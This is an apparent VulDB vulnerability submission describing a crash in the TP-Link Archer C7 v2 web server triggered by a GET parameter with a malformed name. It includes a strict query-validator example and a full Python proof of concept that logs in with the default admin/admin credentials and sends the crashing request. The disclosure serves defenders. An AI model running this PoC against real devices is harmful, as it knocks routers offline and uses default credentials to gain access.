| Title | The new crash vulnerability on TPLINK c7v2 device |
|---|
| Description | # The new crash vulnerability on TPLINK c7v2 device
## Overview of the Vulnerability
The vulnerability affects the TP-Link Archer C7 v2 router running firmware ArcherC7v2_en_us_180114 (download link: https://www.tp-link.com/us/support/download/archer-c7/v2/#Firmware). It differs from the previously reported issues in this device in its attack surface: the trigger is a GET request in which a parameter name has been mutated so that it contains bytes the firmware's request parser does not handle (in the PoC: a double quote, a vertical tab and a byte above 0x7F, percent-encoded). The parser fails on that string and the firmware's web server crashes. Because the same parsing path is used wherever GET request parameters are handled, the issue is not confined to a single page, and a crafted request can be used to crash the target device.
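As an added illustration (not part of the original submission and not TP-Link's firmware code), the check below shows the class of input the advisory describes and how a request parser should reject it: the query string is percent-decoded exactly once to raw bytes, which is what the firmware's parser sees, and every parameter name must then be a plain ASCII identifier that appears in a per-endpoint allowlist. The allowlist is an assumption built from the parameter names the PoC sends to PingIframeRpm.htm; the firmware's real parser and its accepted names are not known from this page. The mutated key from the PoC is rejected both in its decoded form and in the double-encoded form that Python `requests` actually puts on the wire.

```python
import re
from typing import Dict, Optional, Set
from urllib.parse import unquote_to_bytes

# Assumed allowlist for PingIframeRpm.htm, taken from the parameter names the
# PoC sends. The mutated key in the PoC replaces a parameter whose original
# name the advisory does not give, so it is deliberately not listed here.
PING_PARAMS: Set[str] = {"ping_addr", "doType", "isNew", "sendNum", "overTime", "trHops"}

# A parameter name is an ASCII identifier of bounded length; anything else
# (quotes, control bytes such as 0x0B, bytes >= 0x80, a stray '%') is rejected.
NAME_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]{0,31}")
MAX_VALUE_LEN = 64


class BadQuery(ValueError):
    """Raised when a query string fails the strict checks below."""


def validate_query(raw_query: str, allowed: Set[str] = PING_PARAMS) -> Dict[str, str]:
    """Parse raw_query strictly and return {name: value}.

    The query is decoded once, to bytes, mirroring a firmware parser's own
    percent-decoding. Names and values must then be ASCII, names must be
    identifiers from the allowlist, values must be printable and bounded,
    and no name may repeat.
    """
    params: Dict[str, str] = {}
    for pair in raw_query.split("&"):
        if not pair:
            continue
        enc_name, _, enc_value = pair.partition("=")
        name_bytes = unquote_to_bytes(enc_name)
        value_bytes = unquote_to_bytes(enc_value.replace("+", " "))
        try:
            name = name_bytes.decode("ascii")
            value = value_bytes.decode("ascii")
        except UnicodeDecodeError:
            raise BadQuery(f"non-ASCII byte in parameter {enc_name!r}") from None
        if not NAME_RE.fullmatch(name):
            raise BadQuery(f"malformed parameter name {enc_name!r}")
        if name not in allowed:
            raise BadQuery(f"unexpected parameter {name!r}")
        if name in params:
            raise BadQuery(f"duplicate parameter {name!r}")
        if len(value) > MAX_VALUE_LEN or not value.isprintable():
            raise BadQuery(f"bad value for parameter {name!r}")
        params[name] = value
    return params


def reject_reason(raw_query: str, allowed: Set[str] = PING_PARAMS) -> Optional[str]:
    """Return None if raw_query passes, otherwise the reason it was rejected."""
    try:
        validate_query(raw_query, allowed)
    except BadQuery as exc:
        return str(exc)
    return None


# Constructed sample inputs. BENIGN is the PoC's ping request without the
# mutated key; MUTATED_DECODED appends that key as the device decodes it
# (bytes 7 " 0x0B 0x80 2); MUTATED_WIRE appends it as Python requests sends
# it, since urlencode() percent-encodes the '%' characters a second time.
BENIGN = "ping_addr=192.168.0.1&doType=ping&isNew=new&sendNum=4&overTime=800&trHops=20"
MUTATED_DECODED = BENIGN + "&7%22%0B%802=64"
MUTATED_WIRE = BENIGN + "&7%2522%250B%25802=64"

if __name__ == "__main__":
    for label, query in [("benign", BENIGN), ("decoded", MUTATED_DECODED), ("wire", MUTATED_WIRE)]:
        print(f"{label:8s}: {reject_reason(query) or 'accepted'}")
```

Decoding to bytes rather than to `str` is the important design choice: a lenient parser such as `urllib.parse.parse_qsl` silently maps the 0x80 byte to U+FFFD and lets the key through as a "valid" name, which is exactly the kind of input the firmware fails on. Running the block prints `accepted` for the benign query and the rejection reason for both mutated forms.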
## Business Impact
The vulnerability is easy to exploit: a single crafted HTTP request from a host that can reach the web interface takes the device's web server down, which is a denial of service for any business that depends on the router. Beyond the outage itself, an incident of this kind undermines customer confidence and damages the reputation of the affected business. Because the flaw sits in the parsing of GET request parameters rather than in one specific page, the attack surface is broad and the impact potentially extends to a wide range of devices and systems.
## Steps to Reproduce
The PoC below reproduces the crash. To run it against another device, change the web interface address 192.168.0.1 everywhere it appears in the script, including the two regular expressions that extract and substitute the session token. Note that the script authenticates first: the Cookie header carries HTTP Basic credentials for the user admin with the MD5 of the password "admin" (the default account), and the login reply yields the per-session token that the firmware embeds in every URL path. Replace the cookie if the device uses a different password.
## Proof of Concept (POC)
The PoC sends one ping request to PingIframeRpm.htm whose parameter list contains a mutated parameter name. Afterwards the web interface is no longer reachable because the firmware's web server has crashed; the script detects this by attempting the login again and printing 'Success' when that attempt fails.
```python
import requests
import re

# The target's web interface is 192.168.0.1 throughout this script, including
# the regular expressions below; change all occurrences for another device.


def update_token():
    # Log in and read the per-session token that the firmware embeds in the
    # URL path of the redirect to Index.htm
    # (http://192.168.0.1/<TOKEN>/userRpm/Index.htm).
    url = 'http://192.168.0.1/userRpm/LoginRpm.htm'
    headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'close',
        'Referer': 'http://192.168.0.1/',
        # HTTP Basic "admin:<MD5 of the password>", here the MD5 of "admin",
        # i.e. the default admin/admin account. Replace for other credentials.
        'Cookie': 'Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D',
        'Upgrade-Insecure-Requests': '1',
    }
    params = {
        'Save': 'Save',
    }
    response = requests.get(url, headers=headers, params=params)
    response_text = response.text
    pattern = r'http://192\.168\.0\.1/(\w+)/userRpm/Index\.htm'
    match = re.search(pattern, response_text)
    # If no token is present, match is None and this raises AttributeError;
    # the crash check at the bottom relies on that.
    token = match.group(1)
    return token


# Ping page of the diagnostics tool. The placeholder token in the path is
# replaced by the live session token obtained from the login above.
url = 'http://192.168.0.1/XZJSKPAAGEFTGDPA/userRpm/PingIframeRpm.htm'
new_str = update_token()
pattern = r'(?<=http://192\.168\.0\.1/)\w+(?=/userRpm/PingIframeRpm\.htm)'
new_url = re.sub(pattern, new_str, url)
headers = {
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Connection': 'keep-alive',
    # Referer carries a stale token from the original capture; kept as recorded.
    'Referer': 'http://192.168.0.1/XZGTYORAZTUKMSRA/userRpm/DiagnosticRpm.htm',
    'Cookie': 'Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D',
    'Upgrade-Insecure-Requests': '1',
}
params = {
    'ping_addr': '192.168.0.1',
    'doType': 'ping',
    'isNew': 'new',
    'sendNum': '4',
    # Mutated parameter name: percent-encoded double quote (0x22), vertical
    # tab (0x0B) and a non-ASCII byte (0x80). requests percent-encodes the
    # '%' characters again, so the key goes on the wire as 7%2522%250B%25802.
    '7%22%0B%802': '64',
    'overTime': '800',
    'trHops': '20',
}
response = requests.get(new_url, headers=headers, params=params)

# Crash check: if the web server went down, the login either fails to connect
# (requests raises) or returns a page without a token (AttributeError).
try:
    update_token()
except:
    print('Success')
``` |
|---|
| Source | https://www.tp-link.com/us/support/download/archer-c7/v2/#Firmware |
|---|
| User | a2ure (UID 41072) |
|---|
| Submission | 04/27/2023 06:58 (3 years ago) |
|---|
| Moderation | 05/11/2023 07:29 (14 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 228775 [TP-Link Archer C7v2 v2_en_us_180114 GET Request Parameter denial of service] |
|---|
| Points | 20 |
|---|